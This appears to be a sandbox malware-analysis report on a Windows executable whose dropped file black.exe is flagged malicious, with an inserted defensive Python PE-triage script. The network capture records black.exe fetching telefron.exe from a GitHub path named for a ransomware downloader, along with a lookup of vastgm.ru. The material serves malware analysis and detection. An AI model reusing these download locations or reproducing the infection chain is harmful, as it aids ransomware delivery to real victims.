                                                Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                Category:dropped
                                                Size (bytes):386528
                                                Entropy (8bit):7.9736851559892425
                                                Encrypted:false
                                                SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                Malicious:false
                                                Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                Process:C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):550912
                                                Entropy (8bit):7.713690387908805
                                                Encrypted:false
                                                SSDEEP:6144:eVtna0OB1sZqP+jPVtSfj+Bv/pvteHwxBBBvYfrZcE0X+VkV/M0wZSca7ForfYEd:E5f0+B3pUHwpJYTcOSV5suQeEFHncyQ
                                                MD5:09929B04B0C29E2722009F49FAF7183C
                                                SHA1:8FBACCD01E2F6E3213140402766B90E0409C92BE
                                                SHA-256:2AA22D6CD757C6E46D10FD8DB264481C299FF4646F2698C7A1976384D7C20EE2
                                                SHA-512:CC9728AF886B748119AE2BEDE4B7E9FF5F2245EEA3D1B9034E943D33A060D78E0191B8DF1B80E5E01F666B0DE6473C5D846CB446D7F83925BD83FBA5BE9D091B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 34%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..~............... ........@.. ....................... ............`.....................................(....................................................................................`.................H............text....|... ...................... ..`.|]Y................................ ..`.z~z.........`......................@....%?T.....X.......Z.................. ..`.rsrc................`..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):550912
                                                Entropy (8bit):7.713690387908805
                                                Encrypted:false
                                                SSDEEP:6144:eVtna0OB1sZqP+jPVtSfj+Bv/pvteHwxBBBvYfrZcE0X+VkV/M0wZSca7ForfYEd:E5f0+B3pUHwpJYTcOSV5suQeEFHncyQ
                                                MD5:09929B04B0C29E2722009F49FAF7183C
                                                SHA1:8FBACCD01E2F6E3213140402766B90E0409C92BE
                                                SHA-256:2AA22D6CD757C6E46D10FD8DB264481C299FF4646F2698C7A1976384D7C20EE2
                                                SHA-512:CC9728AF886B748119AE2BEDE4B7E9FF5F2245EEA3D1B9034E943D33A060D78E0191B8DF1B80E5E01F666B0DE6473C5D846CB446D7F83925BD83FBA5BE9D091B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 34%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..~............... ........@.. ....................... ............`.....................................(....................................................................................`.................H............text....|... ...................... ..`.|]Y................................ ..`.z~z.........`......................@....%?T.....X.......Z.................. ..`.rsrc................`..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Entropy (8bit):7.509626966343186
                                                TrID:
                                                • Win64 Executable GUI (202006/5) 92.65%
                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                • DOS Executable Generic (2002/1) 0.92%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:Y5kEUsYDFr.exe
                                                File size:912'111 bytes
                                                MD5:ec773998b0078cc58100fdb4d27dc3f4
                                                SHA1:491a3d8d31c9eabcd8f6236203c54daa12031aab
                                                SHA256:ff4fd58c1db6e88c768665983b2212e53204d7a07b3769883882179d34258933
                                                SHA512:00c01a72b8dc6254629cf942d30c05015ef44b90ad65da59b07019de3fee14f23d20f4611123308937c46f256e654e054447f42d1132f89dc1cf0af1f1b8bd60
                                                SSDEEP:24576:yuDXTIGaPhEYzUzA0JZtduqcudFpYePc+98dhK:1Djlabwz97ZdvJydU
                                                TLSH:7115D00AF7E805F8E077E538C9574946F77A7C4903709A8F13A5166B2F673A09E3A321
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\
                                                Icon Hash:1515d4d4442f2d2d
                                                Entrypoint:0x140032ee0
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x140000000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x66409723 [Sun May 12 10:17:07 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:2
                                                File Version Major:5
                                                File Version Minor:2
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:2
                                                Import Hash:b1c5b1beabd90d9fdabd1df0779ea832
                                                Instruction
                                                sub rsp, 28h
                                                call 00007F5EECB80A78h
                                                add rsp, 28h
                                                jmp 00007F5EECB8040Fh
                                                int3
                                                int3
                                                mov rax, rsp
                                                mov qword ptr [rax+08h], rbx
                                                mov qword ptr [rax+10h], rbp
                                                mov qword ptr [rax+18h], rsi
                                                mov qword ptr [rax+20h], rdi
                                                push r14
                                                sub rsp, 20h
                                                mov r10, qword ptr [r9+38h]
                                                mov rsi, rdx
                                                mov r14, r8
                                                mov rbp, rcx
                                                mov rdx, r9
                                                mov rcx, rsi
                                                mov rdi, r9
                                                mov ebx, dword ptr [r10]
                                                shl rbx, 04h
                                                add rbx, r10
                                                lea r8, qword ptr [rbx+04h]
                                                call 00007F5EECB7F893h
                                                mov eax, dword ptr [rbp+04h]
                                                and al, 66h
                                                neg al
                                                mov eax, 00000001h
                                                sbb edx, edx
                                                neg edx
                                                add edx, eax
                                                test dword ptr [rbx+04h], edx
                                                je 00007F5EECB805A3h
                                                mov r9, rdi
                                                mov r8, r14
                                                mov rdx, rsi
                                                mov rcx, rbp
                                                call 00007F5EECB825B7h
                                                mov rbx, qword ptr [rsp+30h]
                                                mov rbp, qword ptr [rsp+38h]
                                                mov rsi, qword ptr [rsp+40h]
                                                mov rdi, qword ptr [rsp+48h]
                                                add rsp, 20h
                                                pop r14
                                                ret
                                                int3
                                                int3
                                                int3
                                                sub rsp, 48h
                                                lea rcx, qword ptr [rsp+20h]
                                                call 00007F5EECB6EE23h
                                                lea rdx, qword ptr [rip+00025747h]
                                                lea rcx, qword ptr [rsp+20h]
                                                call 00007F5EECB81672h
                                                int3
                                                jmp 00007F5EECB87854h
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                Programming Language:
                                                • [ C ] VS2008 SP1 build 30729
                                                • [IMP] VS2008 SP1 build 30729
                                                Name | Virtual Address | Virtual Size | Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x597a0 | 0x34 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x597d4 | 0x50 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x70000 | 0xe3bc | .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x6a000 | 0x306c | .pdata
                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7f000 | 0x970 | .reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x536c0 | 0x54 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x53780 | 0x28 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4b3f0 | 0x140 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x48000 | 0x508 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x588bc | 0x120 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                .text | 0x1000 | 0x4676e | 0x46800 | f06bb06e02377ae8b223122e53be35c2 | False | 0.5372340425531915 | data | 6.47079645411382 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata | 0x48000 | 0x128c4 | 0x12a00 | 2de06d4a6920a6911e64ff20000ea72f | False | 0.4499003775167785 | data | 5.273999097784603 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data | 0x5b000 | 0xe75c | 0x1a00 | 0dbdb901a7d477980097e42e511a94fb | False | 0.28275240384615385 | data | 3.2571023907881185 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .pdata | 0x6a000 | 0x306c | 0x3200 | b0ce0f057741ad2a4ef4717079fa34e9 | False | 0.483359375 | data | 5.501810413666288 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .didat | 0x6e000 | 0x360 | 0x400 | 1fcc7b1d7a02443319f8fcc2be4ca936 | False | 0.2578125 | data | 3.0459938492946015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                _RDATA | 0x6f000 | 0x15c | 0x200 | 3f331ec50f09ba861beaf955b33712d5 | False | 0.408203125 | data | 3.3356393424384843 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc | 0x70000 | 0xe3bc | 0xe400 | bc9f91a29304eb418a66064e8181fb64 | False | 0.6335149396929824 | data | 6.778689555051379 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc | 0x7f000 | 0x970 | 0xa00 | 77a9ddfc47a5650d6eebbcc823e39532 | False | 0.52421875 | data | 5.336289720085303 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
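The header fields, section table and per-section entropy above are exactly what a triage script recomputes first when deciding whether to trust a sandbox verdict. The Python below is an added example, not code from the Joe Sandbox report or its tooling: it walks the DOS, file, optional and section headers with nothing but struct, decodes TimeDateStamp and DllCharacteristics the way the report prints them, computes Shannon entropy per section, and flags section names containing characters a linker would never emit (the report raises that signature for the .NET file dropped by black.exe, whose preview above shows names such as `.|]Y`). Input is a constructed PE32+ built inside the block; the timestamp 0x66409723, image base 0x140000000, subsystem and DllCharacteristics set are taken from the report, while the section names, contents and the builder itself are invented for the example.

```python
import math
import struct
from datetime import datetime, timezone
from random import Random

# IMAGE_DLLCHARACTERISTICS_* bits (winnt.h); the report above lists five of them for this sample.
DLL_CHARACTERISTICS = {0x20: "HIGH_ENTROPY_VA", 0x40: "DYNAMIC_BASE", 0x80: "FORCE_INTEGRITY",
                       0x100: "NX_COMPAT", 0x200: "NO_ISOLATION", 0x400: "NO_SEH", 0x800: "NO_BIND",
                       0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
                       0x8000: "TERMINAL_SERVER_AWARE"}
# IMAGE_SCN_* section characteristics used below.
SCN_CODE, SCN_IDATA, SCN_EXEC, SCN_READ, SCN_WRITE = 0x20, 0x40, 0x20000000, 0x40000000, 0x80000000

def shannon_entropy(data: bytes) -> float:
    """Bits per byte (0..8), the scale of the report's Entropy (8bit) column."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in (data.count(b) for b in set(data))) if n else 0.0

def decode_timestamp(ts: int) -> str:
    """IMAGE_FILE_HEADER.TimeDateStamp: seconds since the Unix epoch, rendered as the report does."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%a %b %d %H:%M:%S %Y UTC")

def decode_dll_characteristics(flags: int) -> list:
    return [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if flags & bit]

def section_name_is_odd(name: str) -> bool:
    """Linker names use letters, digits, '.', '_' and '$'; anything else is a packer/obfuscator tell."""
    return not name or not all(ch.isalnum() or ch in "._$" for ch in name)

def parse_pe(data: bytes) -> dict:
    """Walk DOS, file, optional and section headers with struct only (PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4
    machine, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20
    is_64 = struct.unpack_from("<H", data, opt)[0] == 0x20B
    entry_rva, = struct.unpack_from("<I", data, opt + 16)
    image_base, = struct.unpack_from("<Q", data, opt + 24) if is_64 else struct.unpack_from("<I", data, opt + 28)
    dllchar, = struct.unpack_from("<H", data, opt + 70)   # same offset in PE32 and PE32+
    sections = []
    for i in range(nsec):
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        name, vsize, va, raw_size, raw_ptr, chars = f[0].rstrip(b"\0").decode("latin-1"), f[1], f[2], f[3], f[4], f[9]
        sections.append({"name": name, "va": va, "vsize": vsize, "raw_size": raw_size,
                         "entropy": shannon_entropy(data[raw_ptr:raw_ptr + raw_size]),
                         "odd_name": section_name_is_odd(name), "executable": bool(chars & SCN_EXEC),
                         "contains_entrypoint": va <= entry_rva < va + max(vsize, raw_size)})
    return {"machine": machine, "is_64": is_64, "timestamp": decode_timestamp(timestamp),
            "image_base": image_base, "entrypoint": image_base + entry_rva,
            "dll_characteristics": decode_dll_characteristics(dllchar), "sections": sections}

def triage(info: dict) -> list:
    """Static findings mirroring the report's signatures (special-char section names, packed sections)."""
    findings = []
    ep = [s for s in info["sections"] if s["contains_entrypoint"]]
    if not ep or not ep[0]["executable"]:
        findings.append("entrypoint outside an executable section")
    for s in info["sections"]:
        if s["odd_name"]:
            findings.append("section name with special chars: %r" % s["name"])
        if s["raw_size"] and s["entropy"] > 7.0:
            findings.append("high-entropy section %s (%.2f): packed or encrypted payload likely" % (s["name"], s["entropy"]))
    return findings

def build_sample_pe(sections, timestamp=0x66409723, dllchar=0xC160) -> bytes:
    """Constructed PE32+ image (headers plus section bodies, no real code) used as offline input."""
    file_align, opt_size = 0x200, 0xF0
    hdr_size = -(-(0x40 + 4 + 20 + opt_size + 40 * len(sections)) // file_align) * file_align
    dos = bytearray(0x40); dos[:2] = b"MZ"; struct.pack_into("<I", dos, 0x3C, 0x40)
    fh = struct.pack("<HHIIIHH", 0x8664, len(sections), timestamp, 0, 0, opt_size, 0x22)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)                 # PE32+
    struct.pack_into("<I", opt, 16, 0x1000)               # AddressOfEntryPoint: start of section 0
    struct.pack_into("<Q", opt, 24, 0x140000000)          # ImageBase, as in the report above
    struct.pack_into("<II", opt, 32, 0x1000, file_align)  # SectionAlignment, FileAlignment
    struct.pack_into("<HH", opt, 68, 2, dllchar)          # Subsystem WINDOWS_GUI, DllCharacteristics
    hdrs, bodies, rva, raw = b"", b"", 0x1000, hdr_size
    for name, body, chars in sections:
        raw_size = -(-len(body) // file_align) * file_align
        hdrs += struct.pack("<8sIIIIIIHHI", name.encode("latin-1"), len(body), rva, raw_size, raw, 0, 0, 0, 0, chars)
        bodies += body.ljust(raw_size, b"\0")
        rva, raw = rva + -(-len(body) // 0x1000) * 0x1000, raw + raw_size
    return (bytes(dos) + b"PE\0\0" + fh + bytes(opt) + hdrs).ljust(hdr_size, b"\0") + bodies

# Constructed sample: a plain code section and a high-entropy section whose name copies the
# ".|]Y" visible in the dropped .NET file's preview above (its bytes are seeded random, not that file).
_rng = Random(1)
SAMPLE_PE = build_sample_pe([
    (".text", b"\x90" * 4000 + b"\xcc" * 96, SCN_CODE | SCN_EXEC | SCN_READ),
    (".|]Y", bytes(_rng.getrandbits(8) for _ in range(4096)), SCN_IDATA | SCN_READ | SCN_WRITE),
])

if __name__ == "__main__":
    info = parse_pe(SAMPLE_PE)
    print(info["timestamp"], hex(info["entrypoint"]), info["dll_characteristics"])
    for s in info["sections"]:
        print("%-8s va=%#x raw=%#x entropy=%.3f" % (s["name"], s["va"], s["raw_size"], s["entropy"]))
    print(triage(info))
```

Entropy is computed over SizeOfRawData bytes, which is what the table's Entropy column reflects; a section whose VirtualSize far exceeds its raw size (like .data above) is mostly zero-filled at load time and scores low for that reason, not because it is benign. DllCharacteristics is read at offset 70 of the optional header, which holds in both PE32 and PE32+ because the only layout difference (a 4-byte BaseOfData versus a wider ImageBase) is absorbed before SectionAlignment.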
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x70674 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | | | 1.0027729636048528
PNG | 0x711bc | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | | | 0.9363390441839495
RT_ICON | 0x72768 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | | | 0.47832369942196534
RT_ICON | 0x72cd0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | | | 0.5410649819494585
RT_ICON | 0x73578 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | | | 0.4933368869936034
RT_ICON | 0x74420 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | | | 0.5390070921985816
RT_ICON | 0x74888 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | | | 0.41393058161350843
RT_ICON | 0x75930 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | | | 0.3479253112033195
RT_ICON | 0x77ed8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9809269502193401
RT_DIALOG | 0x7bc4c | 0x2ba | data | | | 0.5286532951289399
RT_DIALOG | 0x7bf08 | 0x13a | data | | | 0.6560509554140127
RT_DIALOG | 0x7c044 | 0xf2 | data | | | 0.71900826446281
RT_DIALOG | 0x7c138 | 0x14a | data | | | 0.6
RT_DIALOG | 0x7c284 | 0x314 | data | | | 0.47588832487309646
RT_DIALOG | 0x7c598 | 0x24a | data | | | 0.6279863481228669
RT_STRING | 0x7c7e4 | 0x1fc | data | | | 0.421259842519685
RT_STRING | 0x7c9e0 | 0x246 | data | | | 0.41924398625429554
RT_STRING | 0x7cc28 | 0x1a6 | data | | | 0.514218009478673
RT_STRING | 0x7cdd0 | 0xdc | data | | | 0.65
RT_STRING | 0x7ceac | 0x470 | data | | | 0.3873239436619718
RT_STRING | 0x7d31c | 0x164 | data | | | 0.5056179775280899
RT_STRING | 0x7d480 | 0x110 | data | | | 0.5772058823529411
RT_STRING | 0x7d590 | 0x158 | data | | | 0.4563953488372093
RT_STRING | 0x7d6e8 | 0xe8 | data | | | 0.5948275862068966
RT_STRING | 0x7d7d0 | 0x1c6 | data | | | 0.5242290748898678
RT_STRING | 0x7d998 | 0x268 | data | | | 0.4837662337662338
RT_GROUP_ICON | 0x7dc00 | 0x68 | data | | | 0.7019230769230769
RT_MANIFEST | 0x7dc68 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.39786666666666665
DLL | Import
KERNEL32.dll | LocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 9, 2024 07:03:43.373780012 CET | 62332 | 53 | 192.168.2.4 | 1.1.1.1
Dec 9, 2024 07:03:43.510727882 CET | 53 | 62332 | 1.1.1.1 | 192.168.2.4
Dec 9, 2024 07:03:43.536669970 CET | 59154 | 53 | 192.168.2.4 | 1.1.1.1
Dec 9, 2024 07:03:44.108558893 CET | 53 | 59154 | 1.1.1.1 | 192.168.2.4
Dec 9, 2024 07:05:08.934978962 CET | 52689 | 53 | 192.168.2.4 | 1.1.1.1
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 9, 2024 07:03:43.373780012 CET | 192.168.2.4 | 1.1.1.1 | 0xc323 | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
Dec 9, 2024 07:03:43.536669970 CET | 192.168.2.4 | 1.1.1.1 | 0x8745 | Standard query (0) | vastgm.ru | A (IP address) | IN (0x0001) | false
Dec 9, 2024 07:05:08.934978962 CET | 192.168.2.4 | 1.1.1.1 | 0x8e2f | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 9, 2024 07:03:43.510727882 CET | 1.1.1.1 | 192.168.2.4 | 0xc323 | No error (0) | github.com | | 20.233.83.145 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 07:03:44.108558893 CET | 1.1.1.1 | 192.168.2.4 | 0x8745 | No error (0) | vastgm.ru | | 185.178.208.190 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 07:05:09.151154995 CET | 1.1.1.1 | 192.168.2.4 | 0x8e2f | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
• github.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 20.233.83.145 | 80 | 6360 | C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 07:03:43.643467903 CET | 126 | OUT | GET /keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe HTTP/1.1
    Host: github.com
    Connection: Keep-Alive
Dec 9, 2024 07:03:45.094494104 CET | 150 | IN | HTTP/1.1 301 Moved Permanently
    Content-Length: 0
    Location: https://github.com/keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 20.233.83.145 | 443 | 6360 | C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-09 06:03:46 UTC | 126 | OUT | GET /keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe HTTP/1.1
    Host: github.com
    Connection: Keep-Alive
2024-12-09 06:03:47 UTC | 442 | IN | HTTP/1.1 404 Not Found
    Server: GitHub.com
    Date: Mon, 09 Dec 2024 06:03:47 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Cache-Control: no-cache
